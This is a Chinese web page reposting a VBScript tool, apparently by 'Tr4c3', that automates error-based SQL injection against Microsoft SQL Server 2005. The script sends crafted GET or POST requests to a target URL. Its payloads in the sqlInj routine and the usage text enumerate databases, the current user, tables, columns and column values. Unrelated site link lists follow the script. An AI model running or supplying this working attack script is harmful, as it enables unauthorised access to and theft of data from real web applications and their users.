位置: 编程技术 - 正文

Sql2005注射辅助脚本[粗糙版](sql注入攻击代码)

编辑:rootadmin
作者:Tr4c3 '为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。 '欲返回韩文等字符可修改或者行,更多的设置要自己修改 '更多功能请大家自己加入 Const method = "Get" '提交方式请修改此处,有get和post可选 Const DisPlay = "D" 'S 保存到文件,D输出到屏幕 Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD strUrl_B = " '基于注射点的不确定性,此处请手工更改 i = 1 '库的基数 k = 0 '表和字段的基数 MyArray = Split(strUrl_B, "?", -1, 1) strUrl = MyArray(0) '取url strArg = MyArray(1) '取参数 Set Args = Wscript.Arguments If Args.Count = 0 Then ShowU End If 'If Args.Count =1 And LCase(Args(0)) '************************************************************************ ' 爆库 '************************************************************************ If Args.Count =1 Then If LCase(Trim(Args(0)))="databases" Then ResuT("---------------===============================--------------") ResuT("All The DataBases:") Do strData = " and quotename(db_name("&i&"))=0--" sqlInj(strData) i = i + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit ElseIf LCase(Trim(Args(0)))= "info" then ResuT("---------------===============================--------------") ResuT("The Current Database is:") strData = " and quotename(db_name())=0--" sqlInj(strData) ResuT("---------------===============================--------------") ResuT("The database User is:") strData = " and quotename(user)=0--" sqlInj(strData) ResuT("---------------===============================--------------") ResuT("The System_user is:") strData = " and quotename(System_user)=0--" sqlInj(strData) ResuT("---------------===============================--------------") Wscript.Quit End If End If '************************************************************************ ' 爆表 '************************************************************************ If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then ResuT("---------------===============================--------------") ResuT("The Tables Of " & Args(0)) Do strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char() AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char()))=0--" sqlInj(strData) k = k + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit End If '************************************************************************ ' 爆字段 '************************************************************************ If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then Database = Args(0) Table = Args(1) TarGet = DataBase & ".dbo." & Table TarGetCol = Database & ".DBO.SYSCOLUMNS" ResuT("---------------===============================--------------") ResuT("The Columns Of " & TarGet) Do strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--" sqlInj(strData) k = k + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit End If '************************************************************************ ' 爆字段值 '************************************************************************ If Args.Count=4 And LCase(Trim(Args(3)))="values" Then Database = Args(0) Table = Args(1) col = Args(2) Target = Database & ".dbo." & Table ResuT("---------------===============================--------------") ResuT("The Values Of " & Args(2) & " in "&Target) Do strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--" sqlInj(strData) k = k + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit End If Sub SqlInj(value) If UCase(method) = "GET" Then value = strArg & value Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", strUrl &"?" & value , False objXML.SetRequestHeader "Referer", strUrl 'objXML.SetRequestHeader "Accept-Language", "EUC-KR" objXML.send() strRevS = objXML.ResponseText '默认用这个 'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个 If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2) ResuT(" |_"&strD) Else strD = "" End If ElseIf UCase(method) = "POST" Then value = strArg & value Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "POST", strUrl, False objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" objXML.SetRequestHeader "Referer", strUrl objXML.send(UrlEncode(value)) strRevS = objXML.ResponseText '默认用这个 'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个 If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2) ResuT(" |_"&strD) Else strD = "" End If End If End Sub Function ResuT(strInfo) If UCase(DisPlay) = "S" Then Set fso = CreateObject("Scripting.FileSystemObject") Set fso1 = fso.OpenTextFile("result.txt",8,True) fso1.WriteLine(strInfo) fso1.Close Set fso = Nothing ElseIf UCase(DisPlay) = "D" Then Wscript.Echo(strInfo) End If End Function Function UrlEncode(str) str = Replace(str," ","+") UrlEncode = str End Function Function bytes2BSTR(vIn) strReturn = "" For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode < &H Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Sql注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at][Dot]com") .Echo("Usage:") .Echo(" cscript"&.ScriptName&" info--爆基本信息") .Echo(" cscript"&.ScriptName&" databases--爆所有库名") .Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名") .Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名") .Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub

推荐整理分享Sql2005注射辅助脚本[粗糙版](sql注入攻击代码),希望有所帮助,仅作参考,欢迎阅读内容。

Sql2005注射辅助脚本[粗糙版](sql注入攻击代码)

文章相关热门搜索词:sql注入神器,sql注入的辅助工具,sql 注入工具,sql注入修复方式,sql注入修补方法,sql注入修补方法,sql注入脚本编写,sql 注入工具,内容如对您有帮助,希望把文章链接给更多的朋友!

sql 不允许进行远程连接可能会导致此失败的解决方法 (provider:命名管道提供程序,error:-无法打开到SQLServer的连接)网站的数据库连接语句为:Server=.0.0.1;uid=sa;pwd=xxx;database=xxx经测试把server=.0.0.1改为server=.

MSSQL数据库备份导入MSSQL 转到的步骤1.生成for版本的数据库脚本的mangerstudio--打开"对象资源管理器"(没有的话按F8),连接到你的实例--右键要转到的库--任务--生成脚

MS-sql 拒绝了对对象 'xxx' (数据库 'xxx',架构 'dbo')的 SELECT 权限的解决方法 问题:Sqlserver默认设置下不允许远程登陆1外围设置tcp/ip和namedpipe同时启用2服务器--〉属性--〉安全性--〉sqlserver和windows认证模式问题:拒绝了对对象'xx

标签: sql注入攻击代码

本文链接地址:https://www.jiuchutong.com/biancheng/319242.html 转载请保留说明!

上一篇:SQL Server 2005恢复数据库详细图文教程(sql server怎么恢复)

下一篇:sql 2005不允许进行远程连接可能会导致此失败的解决方法(不能防止sql注入)

  • 常用的php图片处理类(水印、等比缩放、固定高宽)分享(php图片库)

    常用的php图片处理类(水印、等比缩放、固定高宽)分享(php图片库)

  • PHP常见的6个错误提示及解决方法(php有哪些)

    PHP常见的6个错误提示及解决方法(php有哪些)

  • SQLServer 批量导入目录文件(sql批量导出数据)

    SQLServer 批量导入目录文件(sql批量导出数据)

  • Windows 2003作中转VPN服务器多路由共享上网的方法

    Windows 2003作中转VPN服务器多路由共享上网的方法

  • Ubuntu16.04怎么将桌面左侧的启动器移动到屏幕底部?(ubuntu怎么把软件放到桌面)

    Ubuntu16.04怎么将桌面左侧的启动器移动到屏幕底部?(ubuntu怎么把软件放到桌面)

  • Windows7系统添加或删除输入法图文教程(windows7怎么添加设备)

    Windows7系统添加或删除输入法图文教程(windows7怎么添加设备)

  • DNS轮循的一些介绍(dns轮询是什么意思)

    DNS轮循的一些介绍(dns轮询是什么意思)

  • JavaScript中将数组进行合并的基本方法讲解(javascript中的数字型可以用来保存整数或浮点数(小数))

    JavaScript中将数组进行合并的基本方法讲解(javascript中的数字型可以用来保存整数或浮点数(小数))

  • script标签属性用type还是language(script标签可以放在html哪个位置)

    script标签属性用type还是language(script标签可以放在html哪个位置)

  • JavaScript italics方法入门实例(把字符串显示为斜体)

    JavaScript italics方法入门实例(把字符串显示为斜体)

  • 安装服务费税率是多少
  • 公司代扣个人所得税有完税凭证明
  • 增值税如何进行税收筹划
  • 计提跟支付有啥区别
  • 实收资本增加的印花税
  • 什么情况下可以报警
  • 年末结转增值税之后增值税有余额嘛
  • 收到国外提供免费样品怎么入账?
  • 项目部分回款是什么意思
  • 开外管证再省外预缴税收要怎么报税?
  • 支付给客户的货款叫什么
  • 什么叫经纪代理服务
  • 外地预缴税费怎么做账
  • 哪些税可以在企业中抵扣
  • 贸易利益怎么计算
  • 金税盘要钱不
  • 免租要怎么交税
  • 卖仪表赚钱吗
  • 一次性劳务费需要交税吗
  • 盈余积累转增股本的个税问题
  • 福利费的支付范围
  • 生物制品的生产过程及设备
  • txt文档乱码怎么办
  • 背书转让银行承兑汇票会计分录
  • win10工作站版和企业版的区别
  • 存货损失进项税
  • 计提税金及附加怎么算
  • 腾讯电脑管家的信任区在哪里
  • win10纯净版下载联想驱动
  • UPUPW 更新 64 位 Apache 系列 PHP 7.0 正式版
  • newdot.exe - newdot是什么进程 有什么用
  • 怎么扣除购入的物品
  • PHP:pg_field_table()的用法_PostgreSQL函数
  • 支付离退休人员退休金可以用现金结算吗
  • 政府机关出租房屋要交税吗
  • 税法中实体从旧程序从新什么意思
  • php常用设计模式有哪些
  • 企业注销未抵扣完的进项税额怎么处理做账
  • php大于等于号怎么打
  • command对象可以执行sql语句吗
  • 瑞数5.5逆向笔记(纯扣算法)
  • html爱心代码简单
  • wordpress使用教程
  • 一般户可以转账给员工报销吗
  • 股权变更涉及土地增值税吗
  • 单位销售收入不包括哪些
  • 小企业购入债券作为长期债券投资,应将相关税费计入
  • sql中循环语句怎么写
  • 食堂费用没有发票
  • 银行开的手续费发票开错了
  • 弥补以前年度亏损报表怎么填
  • 应付账款多好还是少好
  • 承租人转租房屋的后果
  • 利润表中资产减值损失为正数是什么原因
  • 进项认证怎么算
  • 传媒公司的骗局把戏
  • 建筑总包收到劳务合同
  • 会计往来账如何记账
  • 资产负债率怎么调整到50%以下
  • 侧边栏应用
  • 怎么提高windows7性能
  • putty无法输入中文
  • 浏览器登录淘宝安全吗
  • window10通知
  • Linux下which、whereis、locate、find 区别
  • sudo service: command not found 报错的解决方法
  • 用360可以装win7系统吗
  • unity进度条有百分比代码
  • egret引擎基础入门
  • nodejs 文件操作
  • Linux服务器无法远程连接
  • 中文路径和英文路径
  • android更新ui的方式
  • jquery事件的响应
  • 深入探讨换个说法怎么说
  • textview hint
  • 国家税务处处长
  • 为何会税控盘时钟异常
  • 航天金穗280怎么入账
  • 非关税壁垒英语翻译
    • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设